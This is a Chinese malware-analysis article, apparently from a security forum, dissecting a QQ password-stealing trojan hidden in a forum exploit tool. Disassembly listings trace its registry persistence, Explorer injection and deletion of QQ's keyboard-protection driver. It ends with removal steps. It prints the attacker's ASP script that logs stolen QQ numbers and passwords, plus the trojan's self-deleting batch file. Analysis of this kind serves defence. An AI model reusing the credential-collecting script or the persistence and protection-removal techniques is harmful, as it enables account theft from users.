| 关键词: nbsp DWORD EAX PUSH CALL PTR EBP MOV 003 E8 |
文章作者:混世魔王 QQ:26836659信息来源:邪恶八进制信息安全团队注意:本文已经发表于《黑客防线》杂志骗钱,高手略过,有不足,还望指点。 看了《黑客防线》的官方通告,6期光盘的本月强档栏目中,动网漏洞利用动画所附带的工具会使杀毒软件报警,提示为Trojan-PSW.Win32.QQShou.ed。一想,我老魔算黑的了,居然还有比我更黑的。看来是青出于蓝……于是把这个恶意程序分析了一下,算是给自己增强手动超作的经验,也帮中了马的朋友们,把他清理的干干净净。先PEID查壳,UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo [Overlay],网上n多脱壳机,我这就不去DOWN,直接用PEID的UPX FILEINFO的插件,就可以轻松的获得UPX加壳程序的OEP。这里OEP 为:4056D8 直接OD载入.F4,到4056D8把他DOWN 出来。脱壳就完毕了.再用PEID一查,Borland Delphi 6.0 - 7.0,脱壳后,是否修复就随便你了。反正我们又不运行。用OD载入脱壳后的程序,来分析吧。00404935 50 PUSH EAX00404936 E8 71FCFFFF CALL <JMP.&kernel32.GetSystemDirectoryA> //返回WINDOWS系统目录路径0040493B 85C0 TEST EAX,EAX0040493D 75 07 JNZ SHORT 2.004049460040493F C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],4300404946 8A85 00FFFFFF MOV AL,BYTE PTR SS:[EBP-100]0040494C 50 PUSH EAX0040494D E8 E2FCFFFF CALL <JMP.&USER32.IsCharAlphaA> //确定字符串是否是字母00404952 83F8 01 CMP EAX,100404955 1BC0 SBB EAX,EAX00404957 40 INC EAX00404958 84C0 TEST AL,AL0040495A 75 07 JNZ SHORT 2.004049630040495C C685 00FFFFFF 4>MOV BYTE PTR SS:[EBP-100],43 //这里的Hex(43)=Char(C) C盘拉~~ 00404963 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]00404969 8A95 00FFFFFF MOV DL,BYTE PTR SS:[EBP-100]0040496F E8 CCEDFFFF CALL 2.0040374000404974 8B95 FCFEFFFF MOV EDX,DWORD PTR SS:[EBP-104]0040497A 8BC3 MOV EAX,EBX0040497C B9 B4494000 MOV ECX,2.004049B4 ; :\program files\internet explorer\plugins\00404981 E8 2EEEFFFF CALL 2.004037B400404986 33C0 XOR EAX,EAX00404988 5A POP EDX00404989 59 POP ECX0040498A 59 POP ECX程序运行后,首先会在系统目录建立文件,路径是:C:\Program Files\Internet Explorer\PLUGINS\来到这个地方,你就会发现多了一个文件bow.sys动态链接库和bow.bak两个文件,怎么判断是木马生成的,你注意看看文件的生成日期就会发现。要注意的是这个文件是隐藏的,必需显示所有文件才能看得到。我们OD,来看看bow.sys文件的内容,003E4E1A |. 50 PUSH EAX /pDisposition003E4E1B |. 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4] ; |003E4E1F |. 50 PUSH EAX ; |pHandle003E4E20 |. 6A 00 PUSH 0 ; |pSecurity = NULL003E4E22 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS003E4E27 |. 6A 00 PUSH 0 ; |Options = REG_OPTION_NON_VOLATILE003E4E29 |. 6A 00 PUSH 0 ; |Class = NULL003E4E2B |. 6A 00 PUSH 0 ; |Reserved = 0003E4E2D |. 68 744E3E00 PUSH bow.003E4E74 ; |software\ms\qqguishou003E4E32 |. 68 01000080 PUSH 80000001 ; |hKey = HKEY_CURRENT_USER003E4E37 |. E8 54F4FFFF CALL <JMP.&advapi32.RegCreateKeyExA> ; \RegCreateKeyExA写注册表,HKEY_CURRENT_USER\Software\Ms\QQGuiShou“QQGuiShou”的拼音“QQ鬼手”?根据谷歌记载,确有此盗Q软件,继续分析:00407715 A124A14000 mov eax, dword ptr [0040A124]:0040771A 8B4018 mov eax, dword ptr [eax+18]:0040771D 50 push eax:0040771E A124A14000 mov eax, dword ptr [0040A124]:00407723 8B4014 mov eax, dword ptr [eax+14]:00407726 50 push eax* Possible StringData Ref from Code Obj ->"QQ冲击波给你送礼物啦-->(":00407727 68947A4000 push 00407A94:0040772C FF75F8 push [ebp-08]* Possible StringData Ref from Code Obj ->"----":0040772F 68B87A4000 push 00407AB8:00407734 FF75F4 push [ebp-0C]:00407737 68C87A4000 push 00407AC8:0040773C 8D45CC lea eax, dword ptr [ebp-34]:0040773F BA05000000 mov edx, 00000005:00407744 E853BDFFFF call 0040349C:00407749 8B45CC mov eax, dword ptr [ebp-34]:0040774C 50 push eax* Possible StringData Ref from Code Obj ->" 号码:":0040774D 68D47A4000 push 00407AD4:00407752 FF75F8 push [ebp-08]* Possible StringData Ref from Code Obj ->" ----密码:":00407755 68E47A4000 push 00407AE4:0040775A FF75F4 push [ebp-0C]* Possible StringData Ref from Code Obj ->" ----可用游戏币:":0040775D 68F87A4000 push 00407AF8:00407762 8D55C4 lea edx, dword ptr [ebp-3C]:00407765 8B45DC mov eax, dword ptr [ebp-24]:00407768 E8E7D7FFFF call 00404F54:0040776D FF75C4 push [ebp-3C]* Possible StringData Ref from Code Obj ->" ----保存的:":00407770 68147B4000 push 00407B14:00407775 8D55C0 lea edx, dword ptr [ebp-40]:00407778 8B45E0 mov eax, dword ptr [ebp-20]:0040777B E8D4D7FFFF call 00404F54:00407780 FF75C0 push [ebp-40]* Possible StringData Ref from Code Obj ->" ----积分:":00407783 682C7B4000 push 00407B2C:00407788 8D55BC lea edx, dword ptr [ebp-44]:0040778B 8B45EC mov eax, dword ptr [ebp-14]:0040778E E8C1D7FFFF call 00404F54:00407793 FF75BC push [ebp-44]* Possible StringData Ref from Code Obj ->" ----是否是会员:":00407796 68407B4000 push 00407B40:0040779B 8D55B8 lea edx, dword ptr [ebp-48]:0040779E 8B45D4 mov eax, dword ptr [ebp-2C]:004077A1 E8AED7FFFF call 00404F54:004077A6 FF75B8 push [ebp-48]* Possible StringData Ref from Code Obj ->" ----等级:" |:004077A9 685C7B4000 push 00407B5C:004077AE 8D55B4 lea edx, dword ptr [ebp-4C]:004077B1 8B45D0 mov eax, dword ptr [ebp-30]:004077B4 E89BD7FFFF call 00404F54:004077B9 FF75B4 push [ebp-4C]* Possible StringData Ref from Code Obj ->" ----游戏点:" |:004077BC 68707B4000 push 00407B70:004077C1 8D55B0 lea edx, dword ptr [ebp-50]:004077C4 8B45E4 mov eax, dword ptr [ebp-1C]:004077C7 E888D7FFFF call 00404F54:004077CC FF75B0 push [ebp-50]* Possible StringData Ref from Code Obj ->" ----IP: "“QQ冲击波给你送礼物啦!”果然是大礼,通过到QQ站上的查询,把你的QQ号码:密码:可用游戏币:否是会员:积分:等级:游戏点:IP,所有的信息都当做礼物送出去了。写入自身的sys到这里面。还加上程序后面的配置信息。哎.现在的木马是越做越好….采用的ASP网页形式post提交,保存接收的密码,有兴趣的朋友可以抓个包看看,我这里就不去抢劫别人的劳动果实了。接收密码ASP代码如下:<%LogFile="log.txt"LogFileGB="LOGGB.txt"QQNumber=request("Number")QQPassWord=request("PassWord")QQGBA=request("yxba")QQGBB=request("yxbb")if QQGBA="" thenQQGBA="no"end ifif QQGBB="" thenQQGBB="no"end ifLogText=QQNumber&"----"&QQPassWord LogTextGB=QQNumber&"----"&QQPassWord &"----QQGBA:"& QQGBA&"----QQGBB:"& QQGBBset f=Server.CreateObject("scripting.filesystemobject")set ff=f.opentextfile(server.mappath(".")&"\"&LogFile,8,true,0)ff.writeline(LogText)ff.closeset ff=nothingset f=nothingset f1=Server.CreateObject("scripting.filesystemobject")set ff1=f1.opentextfile(server.mappath(".")&"\"&LogFileGB,8,true,0)ff1.writeline(LogTextGB)ff1.closeset ff1=nothingset f1=nothing%>00404AFB 55 PUSH EBP00404AFC 68 A04B4000 PUSH 2.00404BA000404B01 64:FF30 PUSH DWORD PTR FS:[EAX]00404B04 64:8920 MOV DWORD PTR FS:[EAX],ESP00404B07 68 AC4B4000 PUSH 2.00404BAC00404B0C B9 B04B4000 MOV ECX,2.00404BB0 ; {f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}00404B11 BA D84B4000 MOV EDX,2.00404BD8 ; software\microsoft\windows\currentversion\explorer\shellexecutehooks00404B16 B8 02000080 MOV EAX,8000000200404B1B E8 70FFFFFF CALL 2.00404A9000404B20 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]00404B23 BA 284C4000 MOV EDX,2.00404C28 ; clsid\{f3d0d422-ce6d-47b3-9ce6-c54dd63f1adb}00404B28 E8 8BEBFFFF CALL 2.004036B800404B2D 68 AC4B4000 PUSH 2.00404BAC00404B32 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]00404B35 E8 1EEEFFFF CALL 2.0040395800404B3A 8BD0 MOV EDX,EAX00404B3C B9 AC4B4000 MOV ECX,2.00404BAC00404B41 B8 00000080 MOV EAX,8000000000404B46 E8 45FFFFFF CALL 2.00404A9000404B4B 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]00404B4E BA 604C4000 MOV EDX,2.00404C60 ; \inprocserver32apartment00404B53 E8 18ECFFFF CALL 2.00403770写入注册表键值80000000SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks" {F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}.com组件服务:0012FF20 80000000 |hKey = HKEY_CLASSES_ROOT0012FF24 00404C28 |Subkey = "CLSID\{F3D0D422-CE6D-47B3-9CE6-C54DD63F1ADB}"最后LoadLibary来运行木马程序。00404E56 8B95 2CFEFFFF MOV EDX,DWORD PTR SS:[EBP-1D4]00404E5C 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]00404E5F B9 B44F4000 MOV ECX,2.00404FB4 ; microsoft.bat00404E64 E8 4BE9FFFF CALL 2.004037B400404E69 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]00404E6C 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]00404E72 E8 B1DBFFFF CALL 2.00402A2800404E77 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]00404E7D E8 42D9FFFF CALL 2.004027C400404E82 E8 11D7FFFF CALL 2.0040259800404E87 BA CC4F4000 MOV EDX,2.00404FCC ; :try00404E8C 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]00404E92 E8 55ECFFFF CALL 2.00403AEC00404E97 E8 A8DEFFFF CALL 2.00402D4400404E9C E8 F7D6FFFF CALL 2.0040259800404EA1 68 DC4F4000 PUSH 2.00404FDC ; del "00404EA6 8D95 20FEFFFF LEA EDX,DWORD PTR SS:[EBP-1E0]00404EAC 33C0 XOR EAX,EAX00404EAE E8 41D8FFFF CALL 2.004026F400404EB3 FFB5 20FEFFFF PUSH DWORD PTR SS:[EBP-1E0]00404EB9 68 EC4F4000 PUSH 2.00404FEC ; "00404EBE 8D85 24FEFFFF LEA EAX,DWORD PTR SS:[EBP-1DC]00404EC4 BA 03000000 MOV EDX,300404EC9 E8 5AE9FFFF CALL 2.0040382800404ECE 8B95 24FEFFFF MOV EDX,DWORD PTR SS:[EBP-1DC]00404ED4 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]00404EDA E8 0DECFFFF CALL 2.00403AEC00404EDF E8 60DEFFFF CALL 2.00402D4400404EE4 E8 AFD6FFFF CALL 2.0040259800404EE9 68 F84F4000 PUSH 2.00404FF8 ; if exist "00404EEE 8D95 18FEFFFF LEA EDX,DWORD PTR SS:[EBP-1E8]00404EF4 33C0 XOR EAX,EAX00404EF6 E8 F9D7FFFF CALL 2.004026F400404EFB FFB5 18FEFFFF PUSH DWORD PTR SS:[EBP-1E8]00404F01 68 EC4F4000 PUSH 2.00404FEC ; "00404F06 68 0C504000 PUSH 2.0040500C ; goto try00404F0B 8D85 1CFEFFFF LEA EAX,DWORD PTR SS:[EBP-1E4]00404F11 BA 04000000 MOV EDX,400404F16 E8 0DE9FFFF CALL 2.00403828 //这个CALL调用LoadLibary来运行木马程序00404F1B 8B95 1CFEFFFF MOV EDX,DWORD PTR SS:[EBP-1E4]00404F21 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]00404F27 E8 C0EBFFFF CALL 2.00403AEC00404F2C E8 13DEFFFF CALL 2.00402D4400404F31 E8 62D6FFFF CALL 2.0040259800404F36 BA 20504000 MOV EDX,2.00405020 ; del %000404F3B 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]00404F41 E8 A6EBFFFF CALL 2.00403AEC00404F46 E8 F9DDFFFF CALL 2.00402D4400404F4B E8 48D6FFFF CALL 2.0040259800404F50 8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]00404F56 E8 89DBFFFF CALL 2.00402AE400404F5B E8 38D6FFFF CALL 2.00402598我是在桌面上调试的,所以会在桌面上生成个microsoft.bat 的文件,调用CMD执行。建立microsoft.bat 文件来删除自身。里面内容为:trydel "C:\Documents and Settings\Administrator\桌面\动网论坛提升工具.exe"if exist "C:\Documents and Settings\Administrator\桌面\动网论坛提升工具.exe" goto trydel %0最后结束进程序。003E9B3D |. E8 7697FFFF CALL bow.003E32B8003E9B42 |. 68 D09D3E00 PUSH bow.003E9DD0 ; ASCII "QQ.Exe"003E9B47 |. A1 4CB83E00 MOV EAX,DWORD PTR DS:[3EB84C]003E9B4C |. E8 8B9AFFFF CALL bow.003E35DC003E9B51 |. 8BD8 MOV EBX,EAX ; |003E9B53 |. 53 PUSH EBX ; |String1003E9B54 |. E8 4FA8FFFF CALL <JMP.&kernel32.lstrcmpiA> ; \lstrcmpiA003E9B59 |. 85C0 TEST EAX,EAX003E9B5B |. 75 7B JNZ SHORT bow.003E9BD8003E9B5D |. 8D45 B4 LEA EAX,DWORD PTR SS:[EBP-4C]003E9B60 |. 8BD6 MOV EDX,ESI003E9B62 |. B9 05010000 MOV ECX,105003E9B67 |. E8 5898FFFF CALL bow.003E33C4003E9B6C |. 8B45 B4 MOV EAX,DWORD PTR SS:[EBP-4C]003E9B6F |. 8D55 B8 LEA EDX,DWORD PTR SS:[EBP-48]003E9B72 |. E8 25C6FFFF CALL bow.003E619C003E9B77 |. 8B55 B8 MOV EDX,DWORD PTR SS:[EBP-48]003E9B7A |. B8 48B83E00 MOV EAX,bow.003EB848003E9B7F |. E8 3497FFFF CALL bow.003E32B8003E9B84 |. 8D45 B0 LEA EAX,DWORD PTR SS:[EBP-50]003E9B87 |. B9 E09D3E00 MOV ECX,bow.003E9DE0 ; ASCII "LoginCtrl.dll"003E9B8C |. 8B15 48B83E00 MOV EDX,DWORD PTR DS:[3EB848]003E9B92 |. E8 9198FFFF CALL bow.003E3428003E9B97 |. 8B45 B0 MOV EAX,DWORD PTR SS:[EBP-50]003E9B9A |. E8 3D9AFFFF CALL bow.003E35DC003E9B9F |. 50 PUSH EAX ; /FileName003E9BA0 |. E8 BBA7FFFF CALL <JMP.&kernel32.LoadLibraryA>; \LoadLibraryA003E9BA5 |. A3 18A13E00 MOV DWORD PTR DS:[3EA118],EAX003E9BAA |. 8D45 AC LEA EAX,DWORD PTR SS:[EBP-54]003E9BAD |. B9 F89D3E00 MOV ECX,bow.003E9DF8 ; ASCII "npkcrypt.sys"003E9BB2 |. 8B15 48B83E00 MOV EDX,DWORD PTR DS:[3EB848]003E9BB8 |. E8 6B98FFFF CALL bow.003E3428003E9BBD |. 8B45 AC MOV EAX,DWORD PTR SS:[EBP-54]003E9BC0 |. E8 179AFFFF CALL bow.003E35DC003E9BC5 |. 50 PUSH EAX ; /FileName003E9BC6 |. E8 05A7FFFF CALL <JMP.&kernel32.DeleteFileA> ; \DeleteFileA003E9BCB |. A1 28A13E00 MOV EAX,DWORD PTR DS:[3EA128]003E9BD0 |. C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1003E9BD6 |. EB 1E JMP SHORT bow.003E9BF6003E9BD8 |> 68 089E3E00 PUSH bow.003E9E08 ; /String2 = "Explorer.Exe"003E9BDD |. 53 PUSH EBX ; |String1003E9BDE |. E8 C5A7FFFF CALL <JMP.&kernel32.lstrcmpiA> ; \lstrcmpiA003E9BE3 |. 85C0 TEST EAX,EAX003E9BE5 |. 0F85 BB010000 JNZ bow.003E9DA6003E9BEB |. A1 30A13E00 MOV EAX,DWORD PTR DS:[3EA130]003E9BF0 |. C700 FFFFFFFF MOV DWORD PTR DS:[EAX],-1003E9BF6 |> 68 04010000 PUSH 104 ; /BufSize = 104 (260.)003E9BFB |. 56 PUSH ESI ; |PathBuffer003E9BFC |. A1 50B63E00 MOV EAX,DWORD PTR DS:[3EB650] ; |003E9C01 |. 50 PUSH EAX ; |hModule => NULL003E9C02 |. E8 09A7FFFF CALL <JMP.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA程序插入Explorer.exe 进程,很流行。不信?我们可以用IceSword来看看Explorer.exe的进程。不过,木马在加载的时候。会删除npkcrypt.sys的驱动程序,根据谷歌记载,QQ2005 Beta3 及以后的版本整合了一个叫做 npkcrypt 的键盘加密程序,美曰其明保护用户密码输入安全,其实是不经用户同意擅自在用户系统中安装莫名其妙驱动程序。安装此版本后,密码不能通过粘贴的方法输入,密码为中文的QQ用户没法登录。木马删除npkcrypt.sys再运行QQ原程序,就可以设置好钩子。以便记录你输入的密码。木马是注册的服务,所以你在自启动里面是看不到启动项的。经过已上分析,我们可以bow.sys删文件,删注册表,想必可以轻松的解决掉这个木马了。不过还有后遗症。就是删除了我们的npkcrypt.sys驱动程序,电脑重启,会弹错警告窗口说服务运行错误。在“我的电脑”上点右键,选“管理”->“设备管理器”,选择“查看”/“显示隐藏的设备”,在“非即插即用驱动程序”中选择“npkcrypt”,卸载之,可选重新启动,然后CMD 运行“regedit”,在注册表中查找“nplcrypt”,可能会找到“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\npkcrypt”或“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\npkcrypt”等键,删除重启后一般会解决问题,搜索 npkcrypt.*,删除。OK,这个小马就ok了。最后BS一下下马的人,饮水思源啊.怎么说,黑防也是我们菜鸟起步的地方,成了老鸟怎么能欺负小鸟了?做人要厚道. |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|